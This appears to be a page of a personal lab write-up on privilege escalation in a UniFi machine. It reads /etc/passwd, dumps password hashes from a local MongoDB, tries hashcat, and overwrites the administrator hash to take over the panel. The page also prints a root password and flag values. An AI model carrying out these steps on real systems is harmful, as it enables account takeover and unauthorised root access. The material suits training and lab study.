privilege escalation

Listing passwd file

unifi@unified:/usr/lib/unifi$ whoami
whoami
unifi
unifi@unified:/usr/lib/unifi$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
unifi:x:999:999::/home/unifi:/bin/sh
mongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin

We can see that there is mangodb user. This means that there is mangodb is running in backend.

ps auxf > ps_data
cat ps_data

bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1

We can see that basic SUID is set.

https://exploit-notes.hdks.org/exploit/database/mongodb-pentesting/exploit-notes.hdks.org

Try to connect to MongoDB locally.

mongo --port 27017

It is not getting connected.

I noticed that the port number is different.

mongo --port 27117

Got the connection.

Add MongoDB in cheatSheat and delete this after adding.

Now I will search in mangoDB.

# List all data base present.
show dbs

I will now switch to ace database.

# Switch DB.
# use <DB name>
use ace

Now I will list collections [Table] in this DB.

# To list collections.
show collections

Now, we can select the collection name and see its content using the below command:

# Seeing collection data.
db.<COllectionName>.find().pretty()
# This will fetch all values and display them in an organized way.
db.admin.find().pretty()

I found an encoded administrator password along with other users' passwords.

"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "[email protected]",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
        "time_created" : NumberLong(1640900495),

"name" : "michael",
        "x_shadow" : "$6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0",

"name" : "Seamus",
        "x_shadow" : "$6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.",
name" : "warren",
        "x_shadow" : "$6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.",
"name" : "james",
        "x_shadow" : "$6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1",

administrator:$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.
michael:$6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0
Seamus:$6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.
warren:$6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.
james:$6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1

Store these hashes in a file named hashes.txt

hashcat -m 1800 --username hashes.txt /usr/share/wordlists/rockyou.txt

Type of hash, I found example hashes in the hashcat website.

It is taking lot of time in cracking.

I will update the password of administrator account using my custom password.

Add mkpasswd command tool in cheat sheet tool.

TO make custom password hash I will use mkpasswd tool. I know the type of hash from hashcat site. it is "sha512crypt $6$, SHA512 (Unix) 2"

# Make command:
mkpasswd -m sha-512 Password@123

$6$7ywc/NFBcKeywqsc$k3I9gFBLAS.j1daV5.QH03AfisVvkRERz6BhxgpyBU9bRPT6d./4K/VmbMii1j8hzQuCVAP8YZI1xCCyawFfF1

Now I will update the value of "x_shadow" of administrator using mandoDB console.

# Update
# > db.<collection_name>.update({id: "1"}, {$set: {username: "king"}})
db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")}, {$set: {"x_shadow" : "$6$7ywc/NFBcKeywqsc$k3I9gFBLAS.j1daV5.QH03AfisVvkRERz6BhxgpyBU9bRPT6d./4K/VmbMii1j8hzQuCVAP8YZI1xCCyawFfF1"}})

Go to login page and enter username as "Administrator" and password as "Password@123".

Then login.

Logged in as administrator.

https://10.129.5.76:8443/manage/site/default/settings/site

When we got to setting then to site. We can see root password in clear text form.

I will ssh to root user.

ssh root@$unified # NotACrackablePassword4U2022

Got access as root user.

root@unified:~# cat root.txt
e50bc93c75b634e4b272d2f771c33681
root@unified:~# cd /home
root@unified:/home# ls
michael
root@unified:/home# cd michael
root@unified:/home/michael# ls
user.txt
root@unified:/home/michael# cat user.txt
6ced1a6a89e666c0620cdb10262ba127

Previousport 8443 [Initial access]NextIncluded - starting point

Last updated 11 months ago

Was this helpful?

hashtagListing passwd file

Listing passwd file